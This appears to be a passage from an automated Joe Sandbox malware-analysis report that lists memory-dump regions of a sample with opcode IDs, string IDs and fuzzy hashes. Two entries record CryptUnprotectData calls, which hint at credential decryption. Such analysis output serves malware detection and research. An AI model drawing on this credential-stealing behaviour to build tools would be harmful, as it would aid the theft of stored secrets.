                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: 0d62868d03b1205c9ce734fa98d590b24bc769ce2e99849db651cd507cef6c01
                                                                                              • Instruction ID: 697c15684342b01604f5b2a2610b6a82460332703f553d9e5b7e00f78d102823
                                                                                              • Opcode Fuzzy Hash: 0d62868d03b1205c9ce734fa98d590b24bc769ce2e99849db651cd507cef6c01
                                                                                              • Instruction Fuzzy Hash: BB81D574E00218CFDB18DFAAC984AADBBF2BF89304F14C069E458AB365DB309945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: 8c5e05c48211e059777fb3d01db6bbd828edeeb8c9d90b52d399701e0defbfbd
                                                                                              • Instruction ID: a947a16bbbae19b12837f9558a3cff05e54450df85d1696348315caa8844cd4b
                                                                                              • Opcode Fuzzy Hash: 8c5e05c48211e059777fb3d01db6bbd828edeeb8c9d90b52d399701e0defbfbd
                                                                                              • Instruction Fuzzy Hash: D281A374E01218CFDB18DFAAD894AADBBF2BF89300F14C069E859AB365DB345945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: 94b6f4219fea9b2b77153ffa26b25a62a08978b90ac3bf92f61234d106080209
                                                                                              • Instruction ID: aad2fca3bf532d4a88874fb819d1144d93ea932b8429ab351967eda806b396aa
                                                                                              • Opcode Fuzzy Hash: 94b6f4219fea9b2b77153ffa26b25a62a08978b90ac3bf92f61234d106080209
                                                                                              • Instruction Fuzzy Hash: 0A819574E00218CFDB18DFAAD994A9DBBF2BF89300F14C069E819AB365DB749945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "
                                                                                              • API String ID: 0-123907689
                                                                                              • Opcode ID: e70d8bca0bd9f2ed86d750405798b58e7f28cd77f16696920ad1cf25ab45bba7
                                                                                              • Instruction ID: 79e23437e051b9661ba124e44473ba0b8808ad6a33731b2175a654d6fbbfef91
                                                                                              • Opcode Fuzzy Hash: e70d8bca0bd9f2ed86d750405798b58e7f28cd77f16696920ad1cf25ab45bba7
                                                                                              • Instruction Fuzzy Hash: F1F113B4E012588FEB14CFA9C49879EBBF2AF88314F24C16AD409AB395D7749985CF50
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36748F5D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996317280.0000000036740000.00000040.00000800.00020000.00000000.sdmp, Offset: 36740000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36740000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: f0ac8a6a501bb908d37e605de0196ed315516f063c6da2ca153f8704bad4f6a8
                                                                                              • Instruction ID: 81e53c47925ea93519e337bfe28decd11d95405562affdb82471e9fa64d31f20
                                                                                              • Opcode Fuzzy Hash: f0ac8a6a501bb908d37e605de0196ed315516f063c6da2ca153f8704bad4f6a8
                                                                                              • Instruction Fuzzy Hash: A91167B2800249EFDB10DF99C845BDEBFF5EF48320F148419E968A7211C379A590DFA1
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36748F5D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996317280.0000000036740000.00000040.00000800.00020000.00000000.sdmp, Offset: 36740000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36740000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: dc15591e36a4bb86b13f29caaa8118422ad166b5f26eeb994c59ec158eb7b1f2
                                                                                              • Instruction ID: 992423af5b3f00b27ab461262ad4ff6fb954a9c7afb4c6b9712e8dba4862d743
                                                                                              • Opcode Fuzzy Hash: dc15591e36a4bb86b13f29caaa8118422ad166b5f26eeb994c59ec158eb7b1f2
                                                                                              • Instruction Fuzzy Hash: DD1144B2800309AFDB10DF99C845BDEBFF5EB48320F508419EA28A7211C779A950DFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hbq
                                                                                              • API String ID: 0-1245868
                                                                                              • Opcode ID: c098915ff1ef93649a51757fdee770bc3c5c96f92781711d1a4ec8c4b02ff17d
                                                                                              • Instruction ID: fd3a5ad061cb30d512af625976f9ed1af87348200cf51486670a71ea0c4a5494
                                                                                              • Opcode Fuzzy Hash: c098915ff1ef93649a51757fdee770bc3c5c96f92781711d1a4ec8c4b02ff17d
                                                                                              • Instruction Fuzzy Hash: B281E074E052289FEB65DF69CC50BEDBBB2AF89300F5081E9D508AB291DB305E85CF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 065d46cb182772d6f682f591214e7442a93db3f8f2a4848bbc94ffee73126bd7
                                                                                              • Instruction ID: 5a05aada87ce4f52fabdb818f827337dee80926671bf66e01d1024a2c2a714a2
                                                                                              • Opcode Fuzzy Hash: 065d46cb182772d6f682f591214e7442a93db3f8f2a4848bbc94ffee73126bd7
                                                                                              • Instruction Fuzzy Hash: 3F826B74E012288FDB65DF69CD98BDDBBB2BB89301F1081EA940DA7265DB315E85CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: da54c996db43042d4e71daf0f1729225ec862ebf4e9e9edce06dad223c88807c
                                                                                              • Instruction ID: f2d8fe48219a85eacb0a0ae28ae1c8afee315baab148a7b3d422343e248ac67a
                                                                                              • Opcode Fuzzy Hash: da54c996db43042d4e71daf0f1729225ec862ebf4e9e9edce06dad223c88807c
                                                                                              • Instruction Fuzzy Hash: 4B727D74E012288FDB65DF69C994BDEBBB2BF89300F1081E9940CAB261DB355E85DF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6693826a41b87f8d05e726cdac85a2eb71e8dbde64b5c910471d25c9ec74c51
                                                                                              • Instruction ID: be8927ebc415f429dc99cd2146f60e122c851b0765a91438b791472c7d107ab3
                                                                                              • Opcode Fuzzy Hash: e6693826a41b87f8d05e726cdac85a2eb71e8dbde64b5c910471d25c9ec74c51
                                                                                              • Instruction Fuzzy Hash: B4225974E00258CFDB14DFA9C884B9DBBB2BF88304F5185AAD509AB351DB349D86CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996317280.0000000036740000.00000040.00000800.00020000.00000000.sdmp, Offset: 36740000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36740000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 971e35f0d85cba787279c138a8cf633670b7f252ff491f5d94567a9df59a0697
                                                                                              • Instruction ID: 14b89e38588b3fff5f244ee0787d5e24ce08a1be5049481626369be1f8e7c913
                                                                                              • Opcode Fuzzy Hash: 971e35f0d85cba787279c138a8cf633670b7f252ff491f5d94567a9df59a0697
                                                                                              • Instruction Fuzzy Hash: F9E1CF74E01218CFEB14DFA5C984B9DBBB2BF89304F6081AAD409BB391DB355A85CF15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 48cd240bacdd6a0148947d3656b088e2b22fcca1b3bbe9cc97717d0127213195
                                                                                              • Instruction ID: d970e968805768e26e7ef0a50b6ccf84e36f14fc871f04168e715918514fac35
                                                                                              • Opcode Fuzzy Hash: 48cd240bacdd6a0148947d3656b088e2b22fcca1b3bbe9cc97717d0127213195
                                                                                              • Instruction Fuzzy Hash: E1D1AE74E01228CFEB14DFA5C994B9DBBB2BF89300F6081A9D509AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 304acd2658b9c56350592626a15de3bc0cd698a150c69b1d8df0e71979c8948e
                                                                                              • Instruction ID: 2c874704fcb1741b5b456e299d2bef8bc8f05a66c78a5493f3fc11ad9df5ebc8
                                                                                              • Opcode Fuzzy Hash: 304acd2658b9c56350592626a15de3bc0cd698a150c69b1d8df0e71979c8948e
                                                                                              • Instruction Fuzzy Hash: 42D1BF74E01228CFEB54DFA5C884B9DBBB2BF89300F6081A9D509AB354DB359E81CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef8e15b0f74cfd9b28a7e04e1b161a8f43cd02ee6b8414279a69b9123e4d1adb
                                                                                              • Instruction ID: c2649825a859225f875ae758f038cf3443e44fa3adad68729a147a23f3efb41e
                                                                                              • Opcode Fuzzy Hash: ef8e15b0f74cfd9b28a7e04e1b161a8f43cd02ee6b8414279a69b9123e4d1adb
                                                                                              • Instruction Fuzzy Hash: 7BD1AE78E002288FEB54DFA5C994B9DBBB2EF89300F6080A9D509BB364DB355D85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996317280.0000000036740000.00000040.00000800.00020000.00000000.sdmp, Offset: 36740000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36740000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7e1bfa59c1907eb683a47709f1857684686c4361031476781a0ff2e5f64318b
                                                                                              • Instruction ID: 71986ae8ff121f97bd0e8f64c5a88ea1f6a1449d056ee7c7f27e8038cfaffa09
                                                                                              • Opcode Fuzzy Hash: f7e1bfa59c1907eb683a47709f1857684686c4361031476781a0ff2e5f64318b
                                                                                              • Instruction Fuzzy Hash: AFD1AF78E00218CFDB55DFA5C994B9DBBB2EF89300F5080A9D909AB364DB355A86CF11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d02b1a95833abb17b94020503c50cddb2b62237e64e0fac27c8701e984af863b
                                                                                              • Instruction ID: 7ef1c1bd5f5c40ec14afc6f246a9d725b63ff107a2ad26c42746a9e531eb84b3
                                                                                              • Opcode Fuzzy Hash: d02b1a95833abb17b94020503c50cddb2b62237e64e0fac27c8701e984af863b
                                                                                              • Instruction Fuzzy Hash: 02C1A174E01218CFEB14DFA5C954B9DBBB2FF88301F1080AAD809A7365DB355A86CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996317280.0000000036740000.00000040.00000800.00020000.00000000.sdmp, Offset: 36740000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36740000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 931ce51e1633c7b6fd1874eda7dceb22b958be3d2c2dc1e5237a51fafe64c346
                                                                                              • Instruction ID: b38562135cd59c90f0245d7095ca088cfcc7c305b8af7ca6a3151f577cfecaa2
                                                                                              • Opcode Fuzzy Hash: 931ce51e1633c7b6fd1874eda7dceb22b958be3d2c2dc1e5237a51fafe64c346
                                                                                              • Instruction Fuzzy Hash: 74C19F74E01218CFEB14DFA5C994B9DBBB2EF89300F6080AAD409AB365DB355E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f3f2b94d87bb79870870d94f74bb928117a1f3d3d420a5327bab59df8c9422a8
                                                                                              • Instruction ID: 67ed9ac41766959549891a216b6030a042974a83ec2a8dcd0ec06c0df37ddd44
                                                                                              • Opcode Fuzzy Hash: f3f2b94d87bb79870870d94f74bb928117a1f3d3d420a5327bab59df8c9422a8
                                                                                              • Instruction Fuzzy Hash: A8915876905619CFEB10EFA0C8587EEBBB1FB4A706F105429D102772E1CB784A45CFA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996509899.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36830000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d63e4a5ab23ac6b20f1eb6e2b0ffb79cf6cf67bbdea76d710544d9a8f2cda2a
                                                                                              • Instruction ID: a0c8f2eb3916457ea269e265d6c2236d2ab596855e57964f03d0718eea773954
                                                                                              • Opcode Fuzzy Hash: 6d63e4a5ab23ac6b20f1eb6e2b0ffb79cf6cf67bbdea76d710544d9a8f2cda2a
                                                                                              • Instruction Fuzzy Hash: 4A915876A05619CFEB10EFA0C8587AEBBB1FB4A706F105429D102772D0CB784A45CFA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 190aa9e7e7b11ad221248e9a04b69ff73e1e124fbf67a863ae04ae0e3200ad88
                                                                                              • Instruction ID: 601172dae73b973371879ab3be7e4e53f2cb847143fd3d46d9ebadf819b1b031
                                                                                              • Opcode Fuzzy Hash: 190aa9e7e7b11ad221248e9a04b69ff73e1e124fbf67a863ae04ae0e3200ad88
                                                                                              • Instruction Fuzzy Hash: 14A1A374D012288FEB64CF6AC954B9DFBF2BF88300F14C1AAD509A7254DB345A85CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb48b2cdf96e1a42c2e5cbf5deaace37f312fe31779f347320b646aad3e3bb06
                                                                                              • Instruction ID: 282c104be7f7c87c8d6534fc5839949fd6263b6f22dbc9e50505d87647a5f006
                                                                                              • Opcode Fuzzy Hash: eb48b2cdf96e1a42c2e5cbf5deaace37f312fe31779f347320b646aad3e3bb06
                                                                                              • Instruction Fuzzy Hash: 40A10674D002088FDB10DFA9C954B9DBBB1FF89304F20826AE509BB3A1DB759985CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c45d8287f63aeb5c24f36691e12bc6c34c1db931cae1c1303f6ef4b70ceb39c
                                                                                              • Instruction ID: 43fb9058d458d7628b9b1131660e65378c6cc8d1391ad1853d5f0b5b44550bcd
                                                                                              • Opcode Fuzzy Hash: 4c45d8287f63aeb5c24f36691e12bc6c34c1db931cae1c1303f6ef4b70ceb39c
                                                                                              • Instruction Fuzzy Hash: 92A1A1B4E012298FEB64CF6AC944B9DFBF2BF88300F15C1AAD509A7250DB345A85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a244238754d822bf59259da87ad020ffba54fc2460b3dde904c126b4322ca3a
                                                                                              • Instruction ID: b6b554ce88b6577b0b81295f2acebaefdaf186ede6588398208b5ad319251d21
                                                                                              • Opcode Fuzzy Hash: 1a244238754d822bf59259da87ad020ffba54fc2460b3dde904c126b4322ca3a
                                                                                              • Instruction Fuzzy Hash: B3910474D00218CFEB10DFA9C848B9CBBB1FF49314F20966AE509BB2A1DB719985CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f73a348398a630460e5b708fc92e66f0300c096618408ddc8c87f5ffbfae1931
                                                                                              • Instruction ID: 125f18ba0d9832e9caa9ed6e2392f6263b21bf2b7d8a720eb50966ff0acf2e68
                                                                                              • Opcode Fuzzy Hash: f73a348398a630460e5b708fc92e66f0300c096618408ddc8c87f5ffbfae1931
                                                                                              • Instruction Fuzzy Hash: 49819F74E00218CFEB04DFA9C894A9DBBB2FF89305F60812AD909BB354DB359946DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 79001749b49f37b892ee7f83380d13bbbe856f6b21a926e5757ff6c6fcb4aedd
                                                                                              • Instruction ID: 968064cb0b1c31d72a3a81a17ef99e7c2f9b61747ecef76dc92c385449c09dac
                                                                                              • Opcode Fuzzy Hash: 79001749b49f37b892ee7f83380d13bbbe856f6b21a926e5757ff6c6fcb4aedd
                                                                                              • Instruction Fuzzy Hash: 89819074E00218CFEB04DFA9C894A9DBBB2FF89301F608129D409BB354DB359946DF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 732d43c0bedcb6340edc02ca3f902c890d9066232ea34187b41e49ab0c808aaa
                                                                                              • Instruction ID: a02151e09527c7af46dc96e3eab631991c079bcd627778c174a14f1a01f35c08
                                                                                              • Opcode Fuzzy Hash: 732d43c0bedcb6340edc02ca3f902c890d9066232ea34187b41e49ab0c808aaa
                                                                                              • Instruction Fuzzy Hash: 3181AF74E10218CFEB04DFA9C990B9DBBB2FB89305F608129D409BB354DB359986DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996419137.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367f0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 63b23f246f60a4f05a452debff76ef4823d1fa0dcd1c1d2eab26ab95f8ba00f0
                                                                                              • Instruction ID: e2c0d2db07471c34240e340c84e1502638cdacbb3fb307aeb40235042ebc9e96
                                                                                              • Opcode Fuzzy Hash: 63b23f246f60a4f05a452debff76ef4823d1fa0dcd1c1d2eab26ab95f8ba00f0
                                                                                              • Instruction Fuzzy Hash: C881AF74E10218CFEB04DFA9C990AADBBB2FF88305F608129D409BB354DB399946DF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e1aec6adc3b22706273ff5c9247ad7821e48e93e00311fd8b4165d421d2e5f9
                                                                                              • Instruction ID: 04e089f18b4103ef82584c81436031b2f16ea6696d0ac8bdeda4a75d44ae3b85
                                                                                              • Opcode Fuzzy Hash: 6e1aec6adc3b22706273ff5c9247ad7821e48e93e00311fd8b4165d421d2e5f9
                                                                                              • Instruction Fuzzy Hash: C281A174E412288FEB65DF69CC90BDDBBB2BB89300F5080EAD848A7251DB315E81CF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83776bcc0a80b84b17db70ba472ddc3b5860a4ee165a87aa4729f962770df2c9
                                                                                              • Instruction ID: 9276496e8107d973987c1d2b9f9e685784207a602aaf9ca68d2c42ccb9f9eac3
                                                                                              • Opcode Fuzzy Hash: 83776bcc0a80b84b17db70ba472ddc3b5860a4ee165a87aa4729f962770df2c9
                                                                                              • Instruction Fuzzy Hash: A471B5B4E016188FEB28CF6AC944B9DBBF2BF88300F14C1EAD548A7254DB704A85CF11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f28c4c951ca14d930424ba8732b2da8e863b55d3b2c35702ab4c8b05119e24f
                                                                                              • Instruction ID: 1bb1e9ea7a5d2498a64c488b144993f96450ecbecdf3039590e1de0dcea637b4
                                                                                              • Opcode Fuzzy Hash: 3f28c4c951ca14d930424ba8732b2da8e863b55d3b2c35702ab4c8b05119e24f
                                                                                              • Instruction Fuzzy Hash: 445191B1D042488BEF24CFAAD8546DDBBB2BF85308FA0D06AC514AF256EB315955CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca17eea91c45a2fcb53f0a5a09ad8b5fc1ebd9055b818aa006ed59ef49c61250
                                                                                              • Instruction ID: 155b97c76b9cb878d9edd93e30d182064d98d8cc1d683af6205751043d52f90e
                                                                                              • Opcode Fuzzy Hash: ca17eea91c45a2fcb53f0a5a09ad8b5fc1ebd9055b818aa006ed59ef49c61250
                                                                                              • Instruction Fuzzy Hash: 0151A674E00218DFDB18DFAAD884A9DBBF2FF88300F248129E819AB365DB345841CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 638001351ce98bd6d8e47443490fe29d826e73e83223c94ac4b5f11e3c8fed47
                                                                                              • Instruction ID: 072fdb88fe9ba8e013b8a2369cbcc970fb2ee3ca1384dfda21a57759247d9d5e
                                                                                              • Opcode Fuzzy Hash: 638001351ce98bd6d8e47443490fe29d826e73e83223c94ac4b5f11e3c8fed47
                                                                                              • Instruction Fuzzy Hash: 6E51B874E00218DFDB18DFAAD884A9DBBF2FF88301F248129E819AB364DB345941CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 992fcf818758a7d1cb7c46dd581a35df3d47ff1acecf9314fe6fa8aa49bf0c1b
                                                                                              • Instruction ID: 73a3e9e474f453b352d9e26632e0bdb6bae5b8a8e5e0b7a95383231e13ae798b
                                                                                              • Opcode Fuzzy Hash: 992fcf818758a7d1cb7c46dd581a35df3d47ff1acecf9314fe6fa8aa49bf0c1b
                                                                                              • Instruction Fuzzy Hash: 3C518474E012189FDB44DFA9D9949DDBBF2FF89300F209169E809AB365DB319905CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
